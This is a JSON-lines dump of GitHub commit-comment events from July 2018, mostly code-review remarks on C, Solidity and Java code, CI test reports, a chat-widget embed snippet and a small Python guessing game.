{"id":"7932971810","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"OleksiyTepliy/GlBaseCamp"},"payload":{"comment":{"id":29631057,"position":67,"line":67,"path":"02-P-Dev_Tools/main.c","commit_id":"e2b866a4e660d320ff0b0852fbac806a5ff82d67","created_at":"2018-07-07T21:45:12Z","updated_at":"2018-07-07T21:45:12Z","author_association":"NONE","body":"`10` is a magic constant here. It's better generalized (args input, or via scanf). If really needed, magic constants are declared in top of file with proper description"}},"created_at":"2018-07-07T21:45:12Z"}
{"id":"7932972673","type":"CommitCommentEvent","actor":{"login":"MitraHotspot"},"repo":{"name":"idoco/intergram"},"payload":{"comment":{"id":29631060,"position":null,"line":null,"path":null,"commit_id":"c5611b04ab18ce5d46ddf2b3f3ba28013869b030","created_at":"2018-07-07T21:45:55Z","updated_at":"2018-07-07T21:45:55Z","author_association":"NONE","body":"</body>\r\n\t<script> window.intergramId = \"604558072\" </script>\r\n<script id=\"intergram\" type=\"text/javascript\" src=\"https://www.intergram.xyz/js/widget.js\"></script>\r\n\r\n<script> \r\n    window.intergramId = \"604558072\";\r\n    window.intergramCustomizations = {\r\n        titleClosed: 'Buka Jendela Obrolan',\r\n        titleOpen: 'Tutup Jendela Obrolan',\r\n        introMessage: 'Selamat datang di MitraHotspot, kirim pesan ke kami jika membutuhkan koneksi',\r\n        autoResponse: 'Pesan anda telah terkirim, tunggu beberapa saat sampai Admin merespon',\r\n        autoNoResponse: 'Pesan anda telah di terima, mohon bersabar ' +\r\n                        'Maaf Admin belum merespon, sedang sibuk atau hubungi kami lain waktu',\r\n        mainColor: \"#E10000\", // Can be any css supported color 'red', 'rgb(255,87,34)', etc\r\n        alwaysUseFloatingButton: false // Use the mobile floating button also on large screens\r\n    };\r\n</script>\r\n<script id=\"intergram\" type=\"text/javascript\" src=\"https://www.intergram.xyz/js/widget.js\"></script>\r\n"}},"created_at":"2018-07-07T21:45:55Z"}
{"id":"7932974576","type":"CommitCommentEvent","actor":{"login":"nisabostanci"},"repo":{"name":"GitBusting/CalendarWebApp"},"payload":{"comment":{"id":29631062,"position":null,"line":null,"path":null,"commit_id":"477c36ba641b4e1afc46d5f10da43d64718a335b","created_at":"2018-07-07T21:47:35Z","updated_at":"2018-07-07T21:47:35Z","author_association":"CONTRIBUTOR","body":"#1 "}},"created_at":"2018-07-07T21:47:35Z"}
{"id":"7932982108","type":"CommitCommentEvent","actor":{"login":"glycerine"},"repo":{"name":"glycerine/gomacro"},"payload":{"comment":{"id":29631070,"position":null,"line":null,"path":null,"commit_id":"cb89a36e6bce9b61720a074ba5eff476a34745a1","created_at":"2018-07-07T21:54:02Z","updated_at":"2018-07-07T21:54:02Z","author_association":"OWNER","body":"yeah. So many things wrong. I didn’t do a PR bc its so ugly, and didn’t work either, lol."}},"created_at":"2018-07-07T21:54:02Z"}
{"id":"7932982927","type":"CommitCommentEvent","actor":{"login":"makaza"},"repo":{"name":"iKilledAppl3/rootlessJB_EL"},"payload":{"comment":{"id":29631072,"position":5,"line":11,"path":"empty_list.xcodeproj/project.pbxproj","commit_id":"abd6c435db772b69694c3b22388829a208943933","created_at":"2018-07-07T21:54:51Z","updated_at":"2018-07-07T21:54:51Z","author_association":"NONE","body":"https://github.com/iKilledAppl3/rootlessJB_EL/commit/abd6c435db772b69694c3b22388829a208943933"}},"created_at":"2018-07-07T21:54:51Z"}
{"id":"7932984395","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29631077,"position":null,"line":null,"path":null,"commit_id":"ca2d4a2e971a806d2c70532c98aa0e28ccacef73","created_at":"2018-07-07T21:56:18Z","updated_at":"2018-07-07T21:56:18Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2785 of 2972 tests passed, 74 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 211 tests had: EIO diffs.\n * 164 tests had: ESO small diffs.\n * 173 tests had: Table big diffs.\n * 102 tests had: MTR small diffs.\n * 71 tests had: ESO big diffs.\n * 35 tests had: MTR big diffs.\n * 30 tests had: Table small diffs.\n * 7 tests had: ERR diffs.\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 644\n * Failed: 1\n\nregression Test Summary\n * Passed: 457\n * Failed: 186\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.71%25-yellow.png)</a> \n"}},"created_at":"2018-07-07T21:56:18Z"}
{"id":"7932984504","type":"CommitCommentEvent","actor":{"login":"TheoRet"},"repo":{"name":"TheoRet/xkeysnail"},"payload":{"comment":{"id":29631078,"position":null,"line":null,"path":null,"commit_id":"4d340ca459937c2784b707c96c0e0e6c531b6acb","created_at":"2018-07-07T21:56:24Z","updated_at":"2018-07-07T21:56:24Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-07T21:56:24Z"}
{"id":"7932984673","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"Railcraft/Railcraft-3D"},"payload":{"comment":{"id":29631079,"position":5,"line":9,"path":"assets/minecraft/models/block/rail_curved.json","commit_id":"8502dab8ca87baca2335836578c98cc0f178b273","created_at":"2018-07-07T21:56:33Z","updated_at":"2018-07-07T21:56:33Z","author_association":"MEMBER","body":"@Generalcamo Didn't you say json does not support decimals?"}},"created_at":"2018-07-07T21:56:33Z"}
{"id":"7932986792","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29631082,"position":25,"line":37,"path":"contracts/Remittance.sol","commit_id":"31b07655a5cd05460484126dbcd1a7495598e4c4","created_at":"2018-07-07T21:58:46Z","updated_at":"2018-07-07T21:58:46Z","author_association":"OWNER","body":"good thinkin, thanks!"}},"created_at":"2018-07-07T21:58:46Z"}
{"id":"7932989714","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29631095,"position":null,"line":null,"path":null,"commit_id":"ca2d4a2e971a806d2c70532c98aa0e28ccacef73","created_at":"2018-07-07T22:01:15Z","updated_at":"2018-07-07T22:01:15Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T22:01:15Z"}
{"id":"7932991681","type":"CommitCommentEvent","actor":{"login":"jsdevel"},"repo":{"name":"vpulim/node-soap"},"payload":{"comment":{"id":29631101,"position":null,"line":null,"path":null,"commit_id":"d6d22c9209a7b2ebbc85e98b7a1a0a3cddb13ea1","created_at":"2018-07-07T22:03:04Z","updated_at":"2018-07-07T22:03:04Z","author_association":"COLLABORATOR","body":"@qwelias i believe this is the PR hat introduced this: https://github.com/vpulim/node-soap/pull/988  Can you pick this up there?  What would your suggested approach be?  We definitely shouldn't break semver.  If anything, we can change it to make it backwards compatible and do a patch release."}},"created_at":"2018-07-07T22:03:04Z"}
{"id":"7932992601","type":"CommitCommentEvent","actor":{"login":"WPMGPRoSToTeMa"},"repo":{"name":"Amaroq7/SPMod"},"payload":{"comment":{"id":29631103,"position":22,"line":22,"path":"src/FloatNatives.cpp","commit_id":"f3437a99192f8572e4dc509d2eb4b1e4a9de9f89","created_at":"2018-07-07T22:03:59Z","updated_at":"2018-07-07T22:03:59Z","author_association":"NONE","body":"`the identifiers with a double underscore anywhere are reserved;`"}},"created_at":"2018-07-07T22:03:59Z"}
{"id":"7932993392","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29631106,"position":59,"line":102,"path":"contracts/Splitter.sol","commit_id":"c5fdd0f54b88d3ed807c368ed3184d5274df3e83","created_at":"2018-07-07T22:04:43Z","updated_at":"2018-07-07T22:04:43Z","author_association":"OWNER","body":"@rob-Hitchens - given it's nature as a splitter, this seemed reasonable to require. but also, b/c the value passed is in wei, I've assumed it's an edge case where the value passed is something so exact that its not divisible by 2 - actually, i expect its order of magnitude to be high enough to make the number some factor of 10, if not 10,000. (If on mainnet, they'd be spending more in gas fees than the value they're sending). But I checked for the only true limitation I had, and so rejected those values that aren't divisible by 2. \r\n\r\nThoughts?"}},"created_at":"2018-07-07T22:04:43Z"}
{"id":"7932995214","type":"CommitCommentEvent","actor":{"login":"UAVXP"},"repo":{"name":"Facepunch/garrysmod"},"payload":{"comment":{"id":29631111,"position":15,"line":8,"path":"garrysmod/gamemodes/base/gamemode/cl_hudpickup.lua","commit_id":"78c11a40b0386639a12fa12f53b9a677a52e4515","created_at":"2018-07-07T22:06:27Z","updated_at":"2018-07-07T22:06:27Z","author_association":"NONE","body":"\"Genetic\"? Not \"Generic\"?"}},"created_at":"2018-07-07T22:06:27Z"}
{"id":"7932996752","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29631114,"position":64,"line":103,"path":"contracts/Splitter.sol","commit_id":"c5fdd0f54b88d3ed807c368ed3184d5274df3e83","created_at":"2018-07-07T22:07:59Z","updated_at":"2018-07-07T22:07:59Z","author_association":"OWNER","body":"Thanks, I had a withdraw function originally, but was thinking that auto-revert was on every solidity function, and so if part failed, the whole failed. \r\nI'll probably set up then to use approve and transferFrom, or else even store a sort of balance on the contract itself to withdraw from."}},"created_at":"2018-07-07T22:07:59Z"}
{"id":"7932998929","type":"CommitCommentEvent","actor":{"login":"micahu"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29631116,"position":3,"line":3,"path":"contracts/Splitter.sol","commit_id":"c5fdd0f54b88d3ed807c368ed3184d5274df3e83","created_at":"2018-07-07T22:10:10Z","updated_at":"2018-07-07T22:10:10Z","author_association":"OWNER","body":"That is cleaner. Thanks."}},"created_at":"2018-07-07T22:10:10Z"}
{"id":"7933003624","type":"CommitCommentEvent","actor":{"login":"sameerfromfsd"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29631127,"position":null,"line":null,"path":null,"commit_id":"a31b5fed1f4caa5f18a5d9825075f372ad9f96ff","created_at":"2018-07-07T22:14:24Z","updated_at":"2018-07-07T22:14:24Z","author_association":"NONE","body":"Why status code is 204  in inspector network tab anyone know ...."}},"created_at":"2018-07-07T22:14:24Z"}
{"id":"7933005289","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29631131,"position":59,"line":102,"path":"contracts/Splitter.sol","commit_id":"c5fdd0f54b88d3ed807c368ed3184d5274df3e83","created_at":"2018-07-07T22:15:56Z","updated_at":"2018-07-07T22:15:56Z","author_association":"NONE","body":"This is a contrived example and what you actually do with it is a business use-case decision. The main take-aways:\r\n\r\n1. Division truncates, it does not round up. \r\n2. It's bad form to overlook leftover amounts that might accumulate in the contract with no method to withdraw. So recognize it and do something. \r\n3. There is no economical way to store data or return the change when the amount is 1 wei, but you need to do something and system integrity should trump gas optimization, _in my opinion_. Think of it as an extra processing fee for odd numbers. Clients can avoid this extra cost by refraining from odd amounts. \r\n4. The 18 decimals is not a very sound basis for assuming it won't happen too often. What if the source of funds is another contract that wants to share calculated interest or royalties so it calculated a number with a lot of precision? It's about 50/50 even odds ... so odd numbers about half of the time. \r\n5. You can send it back, you can store +=1 in the sender's account (perchance to mingle with other funds and eventually be withdrawable at a reasonable cost), you can arbitrarily award it one of the recipients, you can give it to the contract owner, or you can even reject all odd numbers ... be familiar with the pros and cons of each option and pick one, right? Otherwise, it's an oversight that stands out. \r\n"}},"created_at":"2018-07-07T22:15:56Z"}
{"id":"7933006094","type":"CommitCommentEvent","actor":{"login":"michaelmior"},"repo":{"name":"julianhyde/calcite"},"payload":{"comment":{"id":29631132,"position":12,"line":104,"path":"core/src/main/java/org/apache/calcite/rel/metadata/JaninoRelMetadataProvider.java","commit_id":"3fe96727479a2beca3a867bde3b5ae25a601e657","created_at":"2018-07-07T22:16:43Z","updated_at":"2018-07-07T22:16:43Z","author_association":"NONE","body":"I assume this is because the `@Nonnull` annotation can no longer be applied to `key` below?"}},"created_at":"2018-07-07T22:16:43Z"}
{"id":"7933007112","type":"CommitCommentEvent","actor":{"login":"sybdata"},"repo":{"name":"sybdata/proxyAlpine"},"payload":{"comment":{"id":29631135,"position":null,"line":null,"path":null,"commit_id":"390234a385f27ca1a4eb202689077d79c81475b3","created_at":"2018-07-07T22:17:45Z","updated_at":"2018-07-07T22:17:45Z","author_association":"OWNER","body":"![aproxy](https://user-images.githubusercontent.com/24189833/42415083-52159214-8244-11e8-9fa6-7c3821604a8c.png)\r\n"}},"created_at":"2018-07-07T22:17:45Z"}
{"id":"7933007637","type":"CommitCommentEvent","actor":{"login":"ravipathak105"},"repo":{"name":"mridulroyntl/BYTESQUAD"},"payload":{"comment":{"id":29631136,"position":null,"line":null,"path":null,"commit_id":"4aa6ed374a4abfd210f6bcfee69e75cb59fb21cd","created_at":"2018-07-07T22:18:15Z","updated_at":"2018-07-07T22:18:15Z","author_association":"COLLABORATOR","body":"\r\nhttps://drive.google.com/file/d/1VO8YrKL4cVkaRsSGoaqWyn3dRg1___hw/view?usp=sharing\r\n\r\nThis is the link to download the android .apk file"}},"created_at":"2018-07-07T22:18:15Z"}
{"id":"7933009122","type":"CommitCommentEvent","actor":{"login":"Gustavovaler"},"repo":{"name":"Gustavovaler/juego_adivinar_numero"},"payload":{"comment":{"id":29631138,"position":null,"line":null,"path":null,"commit_id":"04b9bd08c30058364055d7c901d4c7b5b2fca630","created_at":"2018-07-07T22:19:49Z","updated_at":"2018-07-07T22:19:49Z","author_association":"OWNER","body":"\r\nimport random\r\nimport time\r\nimport sqlite3\r\n\r\n\r\n#---variables globales-----\r\ningreso=\"\"\r\nenigma=\"\"\r\ntur=0\r\ndeco='=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*='\r\nvidas=0\r\n\r\n\r\nclass Jugador:\r\n    def __init__(self,nombre=\"\"):\r\n        self.nombre=nombre\r\n    def get_nombre(self):\r\n        return self.nombre\r\n    \r\ndef contar_vidas():\r\n    global vidas\r\n    vidas+=1\r\n    return vidas\r\ndef vidas_reset():\r\n    global vidas\r\n    vidas=0\r\n\r\ndef presentacion_single():\r\n    print('          HOLA !! ',p1.get_nombre().upper())\r\n    time.sleep(0.5)\r\n    print('  TE ANIMAS A ADIVINAR EL NUMERO QUE ESTOY PENSADO?? ')\r\n    time.sleep(1)\r\n    print('                     ** ** COMENZAMOS !!  ** **')\r\n    time.sleep(1)\r\n    single()\r\ndef presentacion_dobles():\r\n    print('          HOLA !! ',p1.get_nombre().upper(),' & ',p2.get_nombre().upper())\r\n    time.sleep(0.5)\r\n    print('  SE ANIMAN A ADIVINAR EL NUMERO QUE ESTOY PENSADO?? ')\r\n    time.sleep(1)\r\n    print('                     ** ** COMENZAMOS !!  ** **')\r\n    time.sleep(1)\r\n    dobles()\r\n#--generan el rango del numero a adivinar y separan single de  dobles--- \r\ndef single():\r\n    vidas_reset()\r\n    generar(200)\r\n    procesar(1)\r\ndef dobles():\r\n    vidas_reset()\r\n    generar(500)\r\n    procesar(2)\r\n#------------------------------------------------------------------------\r\ndef cant_players(numero_players):\r\n    if numero_players == 1:\r\n        return 's'\r\n    else:\r\n        return 'd'\r\ndef contador():\r\n    global tur\r\n    tur+=1\r\ndef tur_reset():\r\n    global tur\r\n    tur=0\r\n#--------generador del numero a adivinar--------\r\ndef generar(rang):\r\n    global enigma\r\n    enigma=random.randint(1,rang)\r\n                                   #----    ATENCION   ------\r\n    #print(enigma)#solo modo debugg  <<<<<--- BORRAR ESTA LINEA ---\r\n\r\n    \r\n#------señala al ganador -------------\r\ndef ganaste(nro_player):\r\n    if nro_player == 1:\r\n        print(deco)\r\n        print('GANASTEEEEEEEEEEEEEEE ' ,p1.get_nombre().upper())\r\n        print(\"USASTE \",vidas,' INTENTOS .')\r\n        \r\n        tur_reset()\r\n    else:\r\n        \r\n        print(deco)\r\n        print('GANASTEEEEEEEEEEEEEEE ' ,p2.get_nombre().upper())\r\n        print(\"USASTE \",vidas,' INTENTOS .')\r\n        tur_reset()\r\n\r\ndef printing(c):\r\n    if c == 1:\r\n        print(deco)\r\n        print('NUMERO MUY ALTO')\r\n    elif c ==2:\r\n        print(deco)\r\n        print('NUMERO MUY BAJO')\r\n        \r\n\r\n#---------LOGICA PRINCIPAL---------\r\n\r\ndef procesar(modo):\r\n    global ingreso\r\n    while ingreso != enigma:\r\n        #-----------------------logica para single player\r\n        if modo  == 1:\r\n            try:\r\n                ingreso=int(input(' DIME TU NUMERO '+str(p1.get_nombre().upper())+' : '))\r\n            except:\r\n                print('Solo valores numericos  ** PIERDES EL TURNO **')\r\n                ingreso=int(input(' DIME TU NUMERO '+str(p1.get_nombre().upper())+' : '))\r\n            contar_vidas()\r\n            \r\n            if ingreso>enigma:\r\n                time.sleep(0.5)\r\n                printing(1)\r\n            elif ingreso<enigma:\r\n                time.sleep(0.5)\r\n                printing(2)\r\n            else:\r\n                ganaste(1)\r\n                print(deco)\r\n                time.sleep(1)\r\n                choice=input('QUERES LA REVANCHA??  si/no : ')\r\n                print(deco)\r\n                if choice== 'si' or choice=='SI' or choice== 's' or choice=='S' or  choice== 'Si' :\r\n                    presentacion_single()\r\n                else:\r\n                    inicio()\r\n        #-------- logca de los dobles-------------------------\r\n        elif modo == 2:\r\n            \r\n            if tur %2==0:\r\n                contador()\r\n                try:\r\n                    ingreso=int(input(' DIME TU NUMERO '+str(p1.get_nombre().upper())+' : '))\r\n                except:\r\n                    print('Solo valores numericos  ** PIERDES EL TURNO **')\r\n                    \r\n                if ingreso>enigma:\r\n                    time.sleep(0.5)\r\n                    printing(1)\r\n                elif ingreso<enigma:\r\n                    time.sleep(0.5)\r\n                    printing(2)\r\n                else:\r\n                    ganaste(1)\r\n                    time.sleep(1)\r\n                    print(deco)\r\n                    choice=input('QUIEREN LA REVANCHA??  si/no : ')\r\n                    print(deco)\r\n                    if choice== 'si' or choice=='SI' or choice== 's' or choice=='S' or  choice== 'Si' :\r\n                        presentacion_dobles()\r\n                    else:\r\n                        inicio()\r\n            else:\r\n                contador()\r\n                try:\r\n                    ingreso=int(input(' DIME TU NUMERO '+str(p2.get_nombre().upper())+' : '))\r\n                except:\r\n                    print('Solo valores numericos  ** PIERDES EL TURNO **')\r\n                if ingreso>enigma:\r\n                    printing(1)\r\n                elif ingreso<enigma:\r\n                    printing(2)\r\n                else:\r\n                    ganaste(2)\r\n                    time.sleep(1)\r\n                    print(deco)\r\n                    choice=input('QUIEREN LA REVANCHA??  si/no : ')\r\n                    print(deco)\r\n                    if choice== 'si' or choice=='SI' or choice== 's' or choice=='S' or  choice== 'Si' :\r\n                        presentacion_dobles()\r\n                    else:\r\n                        inicio()\r\n            \r\n    \r\n#-----------------presentacion del juego------------    \r\ndef inicio():\r\n    global p1,p2\r\n    print('        BIENVENIDOS !!!')\r\n    time.sleep(0.5)\r\n    print(' ###   ADIVINA2    ###                                      v.1.2.0')\r\n    time.sleep(0.5)\r\n    try:\r\n        cant_p = cant_players(int(input('   CUANTOS JUGADORES? : ')))\r\n    except:\r\n        print('*DEBES INGRESAR EL NUMERO 1 O EL 2*')\r\n        try:\r\n            cant_p = cant_players(int(input('   CUANTOS JUGADORES? : ')))\r\n        except:\r\n            inicio()\r\n    \r\n        \r\n    if (cant_p=='s'):\r\n        p1=Jugador(input(' DECIME TU NOMBRE :)  > '))\r\n        presentacion_single()\r\n    else:\r\n        p1=Jugador(input(' DECIME TU NOMBRE JUGADOR 1 :  > '))\r\n        p2=Jugador(input(' DECIME TU NOMBRE JUGADOR 2 :  > '))\r\n        presentacion_dobles()\r\n    \r\n        \r\ninicio()\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-07T22:19:49Z"}
{"id":"7933010210","type":"CommitCommentEvent","actor":{"login":"gmikayilov"},"repo":{"name":"gmikayilov/tsst"},"payload":{"comment":{"id":29631145,"position":2,"line":2,"path":"README.md","commit_id":"354eb8dfe110d0c39acd2a150330c83182682baf","created_at":"2018-07-07T22:20:48Z","updated_at":"2018-07-07T22:20:48Z","author_association":"OWNER","body":"hellolo"}},"created_at":"2018-07-07T22:20:48Z"}
{"id":"7933010268","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29631147,"position":64,"line":103,"path":"contracts/Splitter.sol","commit_id":"c5fdd0f54b88d3ed807c368ed3184d5274df3e83","created_at":"2018-07-07T22:20:51Z","updated_at":"2018-07-07T22:20:51Z","author_association":"NONE","body":"Yes, the whole fails. I feel there is something not quite understood. This is very subtle. Since the whole fails, there is the non-obvious problem that a failure in one part is a failure in all parts. What if you don't want Carol's failure to prevent Bob from being paid?\r\n\r\nReverts bubble up to the originally signed transaction from Alice, so all state changes on all branches (in a complex network of dependent contract functions) revert - more precisely, they simply didn't happen because the blockchain notes a failed transaction from Alice, gas gone, the end. \r\n\r\nThis turns into a DoS vulnerability when there are multiple untrusted contracts involved in a single state change trying to do too much at once. The withdrawal pattern is a way to avoid the problem. "}},"created_at":"2018-07-07T22:20:51Z"}
{"id":"7933010870","type":"CommitCommentEvent","actor":{"login":"michaelmior"},"repo":{"name":"julianhyde/calcite"},"payload":{"comment":{"id":29631149,"position":14,"line":299,"path":"core/src/main/java/org/apache/calcite/rel/rules/LoptOptimizeJoinRule.java","commit_id":"3fe96727479a2beca3a867bde3b5ae25a601e657","created_at":"2018-07-07T22:21:29Z","updated_at":"2018-07-07T22:21:29Z","author_association":"NONE","body":"Why is this changed to zero? (I'm sure it's valid, I just don't understand the logic.)"}},"created_at":"2018-07-07T22:21:29Z"}
{"id":"7933011491","type":"CommitCommentEvent","actor":{"login":"anthares101"},"repo":{"name":"anthares101/strawberry"},"payload":{"comment":{"id":29631152,"position":null,"line":null,"path":null,"commit_id":"59a28e3092734049731467cd36597bff823f1da9","created_at":"2018-07-07T22:22:08Z","updated_at":"2018-07-07T22:22:08Z","author_association":"OWNER","body":"Because git clone operations arent part of this module they have been remove"}},"created_at":"2018-07-07T22:22:08Z"}
{"id":"7933012750","type":"CommitCommentEvent","actor":{"login":"jhenrique09"},"repo":{"name":"Whyred-Dev/android_device_xiaomi_whyred"},"payload":{"comment":{"id":29631156,"position":6,"line":464,"path":"overlay/frameworks/base/core/res/res/values/config.xml","commit_id":"726aa46379cce6b746334399e0a0924a6520521d","created_at":"2018-07-07T22:23:16Z","updated_at":"2018-07-07T22:23:16Z","author_association":"MEMBER","body":"https://github.com/Whyred-Dev/android_device_xiaomi_whyred/blob/lineage-15.1/overlay-lineage/lineage-sdk/lineage/res/res/values/config.xml#L38"}},"created_at":"2018-07-07T22:23:16Z"}
{"id":"7933013014","type":"CommitCommentEvent","actor":{"login":"RoXdwa"},"repo":{"name":"codius/codiusd-gui"},"payload":{"comment":{"id":29631159,"position":null,"line":null,"path":null,"commit_id":"0c48a8735d08a88ea621ae86586d64488b6778b8","created_at":"2018-07-07T22:23:33Z","updated_at":"2018-07-07T22:23:33Z","author_association":"NONE","body":"wht is this for?\r\n"}},"created_at":"2018-07-07T22:23:33Z"}
{"id":"7933018853","type":"CommitCommentEvent","actor":{"login":"DocOBITCOIN"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29631181,"position":12,"line":673,"path":"src/net_processing.cpp","commit_id":"2f1a30c63e421b191c62059132b1cd40c24bd4d5","created_at":"2018-07-07T22:29:32Z","updated_at":"2018-07-07T22:29:32Z","author_association":"NONE","body":"True"}},"created_at":"2018-07-07T22:29:32Z"}
{"id":"7933019412","type":"CommitCommentEvent","actor":{"login":"pavelkryukov"},"repo":{"name":"BernardCan/mipt-mips"},"payload":{"comment":{"id":29631185,"position":null,"line":null,"path":null,"commit_id":"589be6817ae1081a8b6d5c487a748a1856fad28a","created_at":"2018-07-07T22:30:03Z","updated_at":"2018-07-07T22:30:03Z","author_association":"NONE","body":"jjjj"}},"created_at":"2018-07-07T22:30:03Z"}
{"id":"7933020839","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":29631192,"position":null,"line":null,"path":null,"commit_id":"e455fae2a79ebe8ea7a2cb39df6ab155550c6f0f","created_at":"2018-07-07T22:31:19Z","updated_at":"2018-07-07T22:31:19Z","author_association":"OWNER","body":"Merged, but - for the future - let's add fewer and fewer vector tables - we're running out of memory (and initialized memory costs memory, even if a civ doesn't use it)."}},"created_at":"2018-07-07T22:31:19Z"}
{"id":"7933021196","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29631195,"position":82,"line":69,"path":"contracts/RockPaperScissors.sol","commit_id":"f6d452abe1551e7d041cac5332dfd155d3c28e68","created_at":"2018-07-07T22:31:40Z","updated_at":"2018-07-07T22:31:40Z","author_association":"NONE","body":"Unless I miss by guess from eyeballing this, this is an unbounded `for` loop which is an anti-pattern. The problem would be that at some number of games (n) the `for` loop will iterate enough times for the gas cost to exceed the block `gasLimit`. We have a process with a certain cost and the total cost will be operation cost * the number of games ... the gas will increase linearly (bad) and then it will not be possible to use the contract at all (very bad). \r\n\r\nThe only way to avoid this is to ensure that the gas cost of your processes are (roughly) equal at all scales, meaning everything must complete in a single operation. Any looping or recursion must be strictly limited (e.g. a max of four loops because of some boundary in the app). Here, I don't see an obvious limit the length of `games` and indeed what we are aiming for is unlimited games in progress. \r\n\r\nThis sort of problem usually boils down to the data structure. You should not be searching for a game. You could re-imagine the way it works:\r\n\r\n1. Players create games and receive gameID keys and reference those keys when they make a move. \r\n2. Mapping of players to games (I don't like this because it assumes a player is only involved in a single same at a time ... or you are right back to searching through an array). \r\n3. Something else?\r\n\r\n"}},"created_at":"2018-07-07T22:31:40Z"}
{"id":"7933021891","type":"CommitCommentEvent","actor":{"login":"nemosminer"},"repo":{"name":"MrPlusGH/NPlusMiner"},"payload":{"comment":{"id":29631199,"position":null,"line":null,"path":null,"commit_id":"5c8d444a8dd02943db7226c4203f085c0bba2fb7","created_at":"2018-07-07T22:32:18Z","updated_at":"2018-07-07T22:32:18Z","author_association":"CONTRIBUTOR","body":"zergpool?"}},"created_at":"2018-07-07T22:32:18Z"}
{"id":"7933023500","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29631202,"position":null,"line":null,"path":null,"commit_id":"ca2d4a2e971a806d2c70532c98aa0e28ccacef73","created_at":"2018-07-07T22:33:52Z","updated_at":"2018-07-07T22:33:52Z","author_association":"NONE","body":"158868652_Issue#5821 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1684 of 1684 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ca2d4a2e971a806d2c70532c98aa0e28ccacef73-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.18%25-green.png)</a>\n"}},"created_at":"2018-07-07T22:33:52Z"}
{"id":"7933026806","type":"CommitCommentEvent","actor":{"login":"limdongjin"},"repo":{"name":"limdongjin/limdongjin"},"payload":{"comment":{"id":29631212,"position":null,"line":null,"path":null,"commit_id":"07e176ef7f6b8142e32d95914a704f60267e1796","created_at":"2018-07-07T22:37:10Z","updated_at":"2018-07-07T22:37:10Z","author_association":"OWNER","body":"Backend: Sequelize 적용 및 Create 액션 생성\r\n\r\nFrontend: 에디터 적용, Form 생성, Ajax, \r\n\r\nqs.stringify를 몰라서 뻘짓많이함"}},"created_at":"2018-07-07T22:37:10Z"}
